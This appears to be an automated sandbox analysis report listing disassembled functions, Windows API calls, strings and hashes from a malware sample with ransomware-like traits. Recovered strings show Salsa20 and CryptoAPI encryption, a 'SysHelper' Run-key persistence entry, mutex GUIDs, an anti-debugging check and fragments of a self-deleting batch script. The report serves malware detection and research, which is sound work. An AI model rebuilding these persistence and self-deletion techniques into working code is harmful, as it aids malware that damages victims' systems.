API ID: Message$FileFindNamePathPeek_memmove$Dispatch
String ID:
API String ID: 273148273-0
Opcode ID: 5d71b88130c3850f1ce6f9c9fc3c3b56fc5be04f011d63241bb511ce3f1a2a20
Instruction ID: 4d52a43d2e6eeb98f1fe08e229a92f838bd03635929547cf71b8ba18611ce854
Opcode Fuzzy Hash: 5d71b88130c3850f1ce6f9c9fc3c3b56fc5be04f011d63241bb511ce3f1a2a20
Instruction Fuzzy Hash: EF429F70D00208DBDF14DFA4C985BDEB7F5BF04308F20456EE415A7291E7B9AA85CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 0040FB98 Relevance: 15.3, APIs: 10, Instructions: 266stringCOMMON

Download Yara Rule

APIs

PathAppendW.SHLWAPI(?,?), ref: 0040FBD5
_memmove.LIBCMT ref: 0040FC3C
PathFileExistsW.SHLWAPI(?,?,?,?), ref: 0040FC63
_malloc.LIBCMT ref: 0040FC72
lstrcpyW.KERNEL32(00000000,?), ref: 0040FC8C
lstrcatW.KERNEL32(00000000,?), ref: 0040FCA5
_free.LIBCMT ref: 0040FCD7

Memory Dump Source

Source File: 00000009.00000002.1747434458.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.1747434458.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1747434458.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_1601.jbxd

Yara matches

Similarity

API ID: Path$AppendExistsFile_free_malloc_memmovelstrcatlstrcpy
String ID:
API String ID: 3232302685-0
Opcode ID: 17126a02ccb6bbc5f32dfe245874f9dcbc49a53b6c6b99fc4e7ab7c0e104719e
Instruction ID: e959444c36dd18fc08dff6604914d564c76187b82df2896015b22d61e5b1ffa1
Opcode Fuzzy Hash: 17126a02ccb6bbc5f32dfe245874f9dcbc49a53b6c6b99fc4e7ab7c0e104719e
Instruction Fuzzy Hash: 09B19F70D00208DBDF20DFA4D945BDEB7B5BF15308F50407AE40AAB291E7799A89CF5A

Uniqueness

Uniqueness Score: -1.00%

Function 004382A2 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002,?,?,00438568,?,00000000), ref: 004382E6
GetLocaleInfoW.KERNEL32(?,20001004,?,00000002,?,?,00438568,?,00000000), ref: 00438310

Strings

ACP, xrefs: 004382B3
OCP, xrefs: 004382C4

Memory Dump Source

Source File: 00000009.00000002.1747434458.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.1747434458.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1747434458.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_1601.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: 102afb5f5093c9dfdd8a19d426743dda05a0526c846065600ba6b69f24068785
Instruction ID: cf0fde08c92294f7ab6fed71b02f11d94bd2ad82eb759ef3fcb1a01a65759ec5
Opcode Fuzzy Hash: 102afb5f5093c9dfdd8a19d426743dda05a0526c846065600ba6b69f24068785
Instruction Fuzzy Hash: FA01C431200615ABDB205E59DC45FD77798AB18B54F10806BF908DA252EF79DA41C78C

Uniqueness

Uniqueness Score: -1.00%

Function 0040C070 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 280COMMON

Download Yara Rule

APIs

__wassert.LIBCMT ref: 0040C09A

Strings

e:\doc\my work (c++)\_git\encryption\encryptionwinapi\Salsa20.inl, xrefs: 0040C090
input != nullptr && output != nullptr, xrefs: 0040C095

Memory Dump Source

Source File: 00000009.00000002.1747434458.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.1747434458.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1747434458.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_1601.jbxd

Yara matches

Similarity

API ID: __wassert
String ID: e:\doc\my work (c++)\_git\encryption\encryptionwinapi\Salsa20.inl$input != nullptr && output != nullptr
API String ID: 3993402318-1975116136
Opcode ID: b02fe9d9872fded329b77120f2c573e6cf8b0d350d9fa23001143a57df52eae3
Instruction ID: 1562121ec4d7abfac7b8d7a3269f54288592c24a15d8ca99342f0f863a8d7c6a
Opcode Fuzzy Hash: b02fe9d9872fded329b77120f2c573e6cf8b0d350d9fa23001143a57df52eae3
Instruction Fuzzy Hash: 43C18C75E002599FCB54CFA9C885ADEBBF1FF48300F24856AE919E7301E334AA558B54

Uniqueness

Uniqueness Score: -1.00%

Function 00424168 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 0042419D
IsDebuggerPresent.KERNEL32(?,?,00000001), ref: 00424252

Strings

i;B, xrefs: 00424168

Memory Dump Source

Source File: 00000009.00000002.1747434458.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.1747434458.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1747434458.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_1601.jbxd

Yara matches

Similarity

API ID: DebuggerPresent_memset
String ID: i;B
API String ID: 2328436684-472376889
Opcode ID: 0bc333208f10a2510305f30f60194ffc8a1e9bc236dda87ca461c0d5e10d6844
Instruction ID: b2deef9000060817df5d9888a0c5d5c31052404ed3c7d79a7a675bf972ea9145
Opcode Fuzzy Hash: 0bc333208f10a2510305f30f60194ffc8a1e9bc236dda87ca461c0d5e10d6844
Instruction Fuzzy Hash: 3231D57591122C9BCB21DF69D9887C9B7B8FF08310F5042EAE80CA6251EB349F858F59

Uniqueness

Uniqueness Score: -1.00%

Function 00411178 Relevance: 3.0, APIs: 2, Instructions: 19encryptionCOMMON

Download Yara Rule

APIs

CryptDestroyHash.ADVAPI32(?), ref: 00411190
CryptReleaseContext.ADVAPI32(?,00000000), ref: 004111A0

Memory Dump Source

Source File: 00000009.00000002.1747434458.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.1747434458.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1747434458.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_1601.jbxd

Yara matches

Similarity

API ID: Crypt$ContextDestroyHashRelease
String ID:
API String ID: 3989222877-0
Opcode ID: 9f13d3873e772d8ace176f4c7e6ba3f69b1ad179b42c3e02a3fcf93c6db6df11
Instruction ID: be51c898aa0ddf1eb2c7ddf255022cb250d4a78141f94ceb906d675081cd9b05
Opcode Fuzzy Hash: 9f13d3873e772d8ace176f4c7e6ba3f69b1ad179b42c3e02a3fcf93c6db6df11
Instruction Fuzzy Hash: F0E0EC74F40305A7EF50DBB6AC49FABB6A86B08745F444526FB04F3251D62CD841C528

Uniqueness

Uniqueness Score: -1.00%

Function 0040EA51 Relevance: 3.0, APIs: 2, Instructions: 19encryptionCOMMON

Download Yara Rule

APIs

CryptDestroyHash.ADVAPI32(?), ref: 0040EA69
CryptReleaseContext.ADVAPI32(?,00000000), ref: 0040EA79

Memory Dump Source

Source File: 00000009.00000002.1747434458.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.1747434458.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1747434458.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_1601.jbxd

Yara matches

Similarity

API ID: Crypt$ContextDestroyHashRelease
String ID:
API String ID: 3989222877-0
Opcode ID: a8a50747f5b84a4213a2f30896a43f764b121f6b091d033cf5eb92e4ffb0f2c5
Instruction ID: d41dd3a2d1aa4a110fdd7d588524fe859ae41a35967fa473e5fd9fc866ad400b
Opcode Fuzzy Hash: a8a50747f5b84a4213a2f30896a43f764b121f6b091d033cf5eb92e4ffb0f2c5
Instruction Fuzzy Hash: B2E0EC78F002059BDF50DBB79C89F6B72A87B08744B440835F804F3285D63CD9118928

Uniqueness

Uniqueness Score: -1.00%

Function 0040EC68 Relevance: 3.0, APIs: 2, Instructions: 19encryptionCOMMON

Download Yara Rule

APIs

CryptDestroyHash.ADVAPI32(?), ref: 0040EC80
CryptReleaseContext.ADVAPI32(?,00000000), ref: 0040EC90

Memory Dump Source

Source File: 00000009.00000002.1747434458.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.1747434458.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1747434458.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_1601.jbxd

Yara matches

Similarity

API ID: Crypt$ContextDestroyHashRelease
String ID:
API String ID: 3989222877-0
Opcode ID: ea67dc9e2b6fd99e4d4b2082a3cd53fb6e3c794773a19c18e99169158be55dec
Instruction ID: 275dd0b1ae59d7aa5d1c23d1b64c6eee76a350be21334d4cde6f8a02617c5264
Opcode Fuzzy Hash: ea67dc9e2b6fd99e4d4b2082a3cd53fb6e3c794773a19c18e99169158be55dec
Instruction Fuzzy Hash: 97E0BDB4F0420597EF60DEB69E49F6B76A8AB04645B440835E904F2281DA3DD8218A29

Uniqueness

Uniqueness Score: -1.00%

Function 004329EC Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000,?,00424266,?,?,?,00000001), ref: 004329F1
UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 004329FA

Memory Dump Source

Source File: 00000009.00000002.1747434458.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.1747434458.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1747434458.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_1601.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 957f1cdd405d7a5f8fcfad9397a47528ed4c184e5d77963140c17adbcc220f91
Instruction ID: d7915fe9b98f2e2675b1eb18c11ae3c40c3bb41b36f5f7d781b256b54fe46c91
Opcode Fuzzy Hash: 957f1cdd405d7a5f8fcfad9397a47528ed4c184e5d77963140c17adbcc220f91
Instruction Fuzzy Hash: A7B09271044208ABDA802B93EC59F883F28EB04A62F084022F60D444628F6254508E99

Uniqueness

Uniqueness Score: -1.00%

Function 004329BB Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(?,?,00431DA6,00431D5B), ref: 004329C1

Memory Dump Source

Source File: 00000009.00000002.1747434458.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.1747434458.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1747434458.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_1601.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 1db6f696b6536d5221d2cbd00a2ff6cb8be2218350df980964d78d67e6efdd32
Instruction ID: cc44753b31e70f30ed06b04cde14f86973f8491ae5a0d649e7a5859f7922213d
Opcode Fuzzy Hash: 1db6f696b6536d5221d2cbd00a2ff6cb8be2218350df980964d78d67e6efdd32
Instruction Fuzzy Hash: 69A0113000020CAB8A002B83EC088883F2CEA002A0B088022F80C008228B22A8208E88

Uniqueness

Uniqueness Score: -1.00%

Function 004278D5 Relevance: 1.3, APIs: 1, Instructions: 7memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00423FED,00507990,00000014), ref: 004278D5

Memory Dump Source

Source File: 00000009.00000002.1747434458.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.1747434458.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1747434458.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_1601.jbxd

Yara matches

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: 993d631f5fa9c6d26d39642974962185f27c3e068b68c4f08d438ea8c169c0b8
Instruction ID: c175dc67e46cb5b18e7b8d473ad54adbb7c8ff58e9170129aa5670ed77b5f39c
Opcode Fuzzy Hash: 993d631f5fa9c6d26d39642974962185f27c3e068b68c4f08d438ea8c169c0b8
Instruction Fuzzy Hash: 79B012F0705102474B480B387C9804935D47708305300407DF00BC11A0EF70C860BA08

Uniqueness

Uniqueness Score: -1.00%

Function 004124E0 Relevance: 79.0, APIs: 36, Strings: 9, Instructions: 214synchronizationCOMMON

Download Yara Rule

APIs

CreateMutexA.KERNEL32(00000000,00000000,{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}), ref: 004124FE
GetLastError.KERNEL32 ref: 00412509
CloseHandle.KERNEL32 ref: 0041251C
CloseHandle.KERNEL32 ref: 00412539
CreateMutexA.KERNEL32(00000000,00000000,{FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}), ref: 00412550
GetLastError.KERNEL32 ref: 0041255B
CloseHandle.KERNEL32 ref: 0041256E

Strings

{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}, xrefs: 004124F5
TEMP, xrefs: 004125DF
{FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}, xrefs: 00412547
D, xrefs: 00412720
@echo off:trydel ", xrefs: 0041262A
del ", xrefs: 00412674
" goto try, xrefs: 00412666
delself.bat, xrefs: 0041261C
"if exist ", xrefs: 00412648

Memory Dump Source

Source File: 00000009.00000002.1747434458.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.1747434458.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1747434458.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_1601.jbxd

Yara matches

Similarity

API ID: CloseHandle$CreateErrorLastMutex
String ID: "if exist "$" goto try$@echo off:trydel "$D$TEMP$del "$delself.bat${1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}${FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}
API String ID: 2372642624-488272950
Opcode ID: 4506a078386c228e7a8f507305766ec05e664451a55683de5f3f64ca7fb9d614
Instruction ID: b8d6f70f31989c1caf7dd59f8aefe182ce9601728b58fe5e15313657dd94e056
Opcode Fuzzy Hash: 4506a078386c228e7a8f507305766ec05e664451a55683de5f3f64ca7fb9d614
Instruction Fuzzy Hash: 03714E72940218AADF50ABE1DC89FEE7BACFB44305F0445A6F609D2090DF759A88CF64

Uniqueness

Uniqueness Score: -1.00%

Function 00427B21 Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 84COMMON

Download Yara Rule

APIs

DecodePointer.KERNEL32 ref: 00427B29
_free.LIBCMT ref: 00427B42

Part of subcall function 00420BED: HeapFree.KERNEL32(00000000,00000000,?,0042507F,00000000,0042520D,00420CE9), ref: 00420C01
Part of subcall function 00420BED: GetLastError.KERNEL32(00000000,?,0042507F,00000000,0042520D,00420CE9), ref: 00420C13

_free.LIBCMT ref: 00427B55
_free.LIBCMT ref: 00427B73
_free.LIBCMT ref: 00427B85
_free.LIBCMT ref: 00427B96
_free.LIBCMT ref: 00427BA1
_free.LIBCMT ref: 00427BC5
EncodePointer.KERNEL32(007053E0), ref: 00427BCC
_free.LIBCMT ref: 00427BE1
_free.LIBCMT ref: 00427BF7
_free.LIBCMT ref: 00427C1F

Strings

Sp, xrefs: 00427B5A, 00427B7E, 00427B90

Memory Dump Source

Source File: 00000009.00000002.1747434458.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.1747434458.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1747434458.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_1601.jbxd

Yara matches

Similarity

API ID: _free$Pointer$DecodeEncodeErrorFreeHeapLast
String ID: Sp
API String ID: 3064303923-631434039
Opcode ID: ce5aad9df44a4d959ab26dd18bbfc051b559e509faa5c70b1469206ba00ae6fa
Instruction ID: d8036121d910c09816430481b6b6363fcbb95216f7cc64832fdbf6810ac9f003
Opcode Fuzzy Hash: ce5aad9df44a4d959ab26dd18bbfc051b559e509faa5c70b1469206ba00ae6fa
Instruction Fuzzy Hash: C2217535A042748BCB215F56BC80D4A7BA4EB14328B94453FEA14573A1CBF87889DA98

Uniqueness

Uniqueness Score: -1.00%

Function 004635B0 Relevance: 21.5, APIs: 7, Strings: 5, Instructions: 475COMMONLIBRARYCODE

Download Yara Rule

APIs

_strncmp.LIBCMT ref: 004636AA
_strncmp.LIBCMT ref: 004636DA
_strncmp.LIBCMT ref: 00463835
_strncmp.LIBCMT ref: 00463946
_strncmp.LIBCMT ref: 004639EA
_strncmp.LIBCMT ref: 00463A06
_strncmp.LIBCMT ref: 00463A27

Strings

-----BEGIN , xrefs: 004636A4
, xrefs: 00463A90
.\crypto\pem\pem_lib.c, xrefs: 00463709, 0046374F, 00463791, 00463A69, 00463B02, 00463B62, 00463B85, 00463BDA
-----, xrefs: 004636D4, 00463A21
-----END , xrefs: 0046382F, 00463940, 004639E4

Memory Dump Source

Source File: 00000009.00000002.1747434458.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.1747434458.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1747434458.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_1601.jbxd

Yara matches

Similarity

API ID: _strncmp
String ID: $-----$-----BEGIN $-----END $.\crypto\pem\pem_lib.c
API String ID: 909875538-2733969777
Opcode ID: cb9e21a8909c22ae086980ad9bb3b6b683aca236df65bd2ad44c41cd33641913
Instruction ID: 696768b63e7695c6252fa4396c8fc8293dc5daf0279c077ed15b414a568efc74
Opcode Fuzzy Hash: cb9e21a8909c22ae086980ad9bb3b6b683aca236df65bd2ad44c41cd33641913
Instruction Fuzzy Hash: 82F1E7B16483806BE721EE25DC42F5B77D89F5470AF04082FF948D6283F678DA09879B

Uniqueness

Uniqueness Score: -1.00%

Function 00425A97 Relevance: 19.6, APIs: 13, Instructions: 84COMMONLIBRARYCODE

Download Yara Rule

APIs

__calloc_crt.LIBCMT ref: 00425AAE

Part of subcall function 00428C96: __calloc_impl.LIBCMT ref: 00428CA5

__calloc_crt.LIBCMT ref: 00425AD2
_free.LIBCMT ref: 00425AE0
__calloc_crt.LIBCMT ref: 00425AEE
_free.LIBCMT ref: 00425AFE
_free.LIBCMT ref: 00425B04
__copytlocinfo_nolock.LIBCMT ref: 00425B13
__wsetlocale_nolock.LIBCMT ref: 00425B20
__setmbcp_nolock.LIBCMT ref: 00425B34
_free.LIBCMT ref: 00425B42
___removelocaleref.LIBCMT ref: 00425B49
___freetlocinfo.LIBCMT ref: 00425B50
_free.LIBCMT ref: 00425B56

Memory Dump Source

Source File: 00000009.00000002.1747434458.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.1747434458.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1747434458.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_1601.jbxd

Yara matches

Similarity

API ID: _free$__calloc_crt$___freetlocinfo___removelocaleref__calloc_impl__copytlocinfo_nolock__setmbcp_nolock__wsetlocale_nolock
String ID:
API String ID: 1503006713-0
Opcode ID: 6bd5cc8f3dd8ebf785cdc17837931ce977b5cf0fd4524e89a9393df48daa8713
Instruction ID: 8b5b6749b4f509f283f4592c8036b9fc340ac08d61b50d13b2524a40b9fdfb6a
Opcode Fuzzy Hash: 6bd5cc8f3dd8ebf785cdc17837931ce977b5cf0fd4524e89a9393df48daa8713
Instruction Fuzzy Hash: 7E21B331705A21ABE7217F66B802E1F7FE4DF41728BD0442FF44459192EA39A800CA5D

Uniqueness

Uniqueness Score: -1.00%

Function 0041BAE0 Relevance: 18.3, APIs: 12, Instructions: 320windowCOMMON

Download Yara Rule

APIs

PostQuitMessage.USER32(00000000), ref: 0041BB49
DefWindowProcW.USER32(?,?,?,?), ref: 0041BBBA
_malloc.LIBCMT ref: 0041BBE4
GetComputerNameW.KERNEL32(00000000,?), ref: 0041BBF4
_free.LIBCMT ref: 0041BCD7

Part of subcall function 00411CD0: RegOpenKeyExW.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?,?,?,?,?,?,004CAC68,000000FF), ref: 00411D12
Part of subcall function 00411CD0: _memset.LIBCMT ref: 00411D3B
Part of subcall function 00411CD0: RegQueryValueExW.KERNEL32(?,SysHelper,00000000,?,?,00000400), ref: 00411D63
Part of subcall function 00411CD0: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004CAC68,000000FF), ref: 00411D6C
Part of subcall function 00411CD0: lstrlenA.KERNEL32(" --AutoStart,?,?), ref: 00411DD6
Part of subcall function 00411CD0: PathFileExistsW.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,-00000001), ref: 00411E48

IsWindow.USER32(?), ref: 0041BF69
DestroyWindow.USER32(?), ref: 0041BF7B
DefWindowProcW.USER32(?,00008003,?,?), ref: 0041BFA8

Memory Dump Source

Source File: 00000009.00000002.1747434458.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.1747434458.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1747434458.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_1601.jbxd

Yara matches

Similarity

API ID: Window$Proc$CloseComputerDestroyExistsFileMessageNameOpenPathPostQueryQuitValue_free_malloc_memsetlstrlen
String ID:
API String ID: 3873257347-0
Opcode ID: 872b512db91234dd009610a63f2564f2aa606f2dd561917cc2f2326c6301647b
Instruction ID: 866eb7db68ae170cd8e17be643faf7720e0ae735171854e0fa5cbc2bc792534d
Opcode Fuzzy Hash: 872b512db91234dd009610a63f2564f2aa606f2dd561917cc2f2326c6301647b
Instruction Fuzzy Hash: 85C19171508340AFDB20DF25DD45B9BBBE0FF85318F14492EF888863A1D7799885CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 00411B90 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 110stringcomCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00411BB0
CoCreateInstance.OLE32(004CE908,00000000,00000001,004CD568,00000000), ref: 00411BC8
CoUninitialize.OLE32 ref: 00411BD0
SHGetSpecialFolderLocation.SHELL32(00000000,00000007,?), ref: 00411C12
SHGetPathFromIDListW.SHELL32(?,?), ref: 00411C22
lstrcatW.KERNEL32(?,00500050), ref: 00411C3A
lstrcatW.KERNEL32(?), ref: 00411C44
GetSystemDirectoryW.KERNEL32(?,00000100), ref: 00411C68
lstrcatW.KERNEL32(?,\shell32.dll), ref: 00411C7A

Strings

\shell32.dll, xrefs: 00411C6E

Memory Dump Source

Source File: 00000009.00000002.1747434458.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.1747434458.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1747434458.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_1601.jbxd

Yara matches

Similarity

API ID: lstrcat$CreateDirectoryFolderFromInitializeInstanceListLocationPathSpecialSystemUninitialize
String ID: \shell32.dll
API String ID: 679253221-3783449302
Opcode ID: 45e46fc2f9e137a48023c8b07f4e0b5fd5f09384ac33b8a62bbc2b8c253a451b
Instruction ID: 1ac700bd2dba931ae0f93f3cd35093afe8c3aec66b03df765643047a9f16b657
Opcode Fuzzy Hash: 45e46fc2f9e137a48023c8b07f4e0b5fd5f09384ac33b8a62bbc2b8c253a451b
Instruction Fuzzy Hash: 1D415E70A40209AFDB10CBA4DC88FEA7B7CEF44705F104499F609D7160D6B4AA45CB54

Uniqueness

Uniqueness Score: -1.00%

Function 004549A0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 107libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,?,00000001,?,00454B72), ref: 004549C7
GetProcAddress.KERNEL32(00000000,_OPENSSL_isservice), ref: 004549D7
GetDesktopWindow.USER32 ref: 004549FB
GetProcessWindowStation.USER32(?,00454B72), ref: 00454A01
GetUserObjectInformationW.USER32(00000000,00000002,00000000,00000000,?,?,00454B72), ref: 00454A1C
GetLastError.KERNEL32(?,00454B72), ref: 00454A2A
GetUserObjectInformationW.USER32(00000000,00000002,?,?,?,?,00454B72), ref: 00454A65
_wcsstr.LIBCMT ref: 00454A8A

Strings

_OPENSSL_isservice, xrefs: 004549D1
Service-0x, xrefs: 00454A80

Memory Dump Source

Source File: 00000009.00000002.1747434458.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.1747434458.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1747434458.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_1601.jbxd

Yara matches

Similarity

API ID: InformationObjectUserWindow$AddressDesktopErrorHandleLastModuleProcProcessStation_wcsstr
String ID: Service-0x$_OPENSSL_isservice
API String ID: 2112994598-1672312481
Opcode ID: 839ece2f53d05b3d3a3b41915715d02d267126b8b76695ecb3f97597e52a1477
Instruction ID: a4b3c478c226dd270820e71b951499fe23bca8177d071b610c32d3665965eb2a
Opcode Fuzzy Hash: 839ece2f53d05b3d3a3b41915715d02d267126b8b76695ecb3f97597e52a1477
Instruction Fuzzy Hash: 04312831A401049BCB10DBBAEC46AAE7778DFC4325F10426BFC19D72E1EB349D148B58

Uniqueness

Uniqueness Score: -1.00%

Function 00454AE0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 75registrywindowCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F4,00454C16,%s(%d): OpenSSL internal error, assertion failed: %s,?,?,?,0045480E,.\crypto\cryptlib.c,00000253,pointer != NULL,?,00451D37,00000000,0040CDAE,00000001,00000001), ref: 00454AFA
GetFileType.KERNEL32(00000000,?,00451D37,00000000,0040CDAE,00000001,00000001), ref: 00454B05
__vfwprintf_p.LIBCMT ref: 00454B27

Part of subcall function 0042BDCC: _vfprintf_helper.LIBCMT ref: 0042BDDF

vswprintf.LIBCMT ref: 00454B5D
RegisterEventSourceA.ADVAPI32(00000000,OPENSSL), ref: 00454B7E
ReportEventA.ADVAPI32(00000000,00000001,00000000,00000000,00000000,00000001,00000000,?,00000000), ref: 00454BA2
DeregisterEventSource.ADVAPI32(00000000), ref: 00454BA9
MessageBoxA.USER32(00000000,?,OpenSSL: FATAL,00000010), ref: 00454BD3

Strings

OPENSSL, xrefs: 00454B77
OpenSSL: FATAL, xrefs: 00454BC7

Memory Dump Source

Source File: 00000009.00000002.1747434458.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.1747434458.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1747434458.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_1601.jbxd

Yara matches

Similarity

API ID: Event$Source$DeregisterFileHandleMessageRegisterReportType__vfwprintf_p_vfprintf_helpervswprintf
String ID: OPENSSL$OpenSSL: FATAL
API String ID: 277090408-1348657634
Opcode ID: 48266b123bee2effe3eea144965b75bbd91e26d62acab2e3a1446f4d096604c6
Instruction ID: 2d266f03b07cc91b1361f4b715b0612335af4cc100d4b249efeb6d9ab3704f8b
Opcode Fuzzy Hash: 48266b123bee2effe3eea144965b75bbd91e26d62acab2e3a1446f4d096604c6
Instruction Fuzzy Hash: 74210D716443006BD770A761DC47FEF77D8EF94704F80482EF699861D1EAB89444875B

Uniqueness

Uniqueness Score: -1.00%

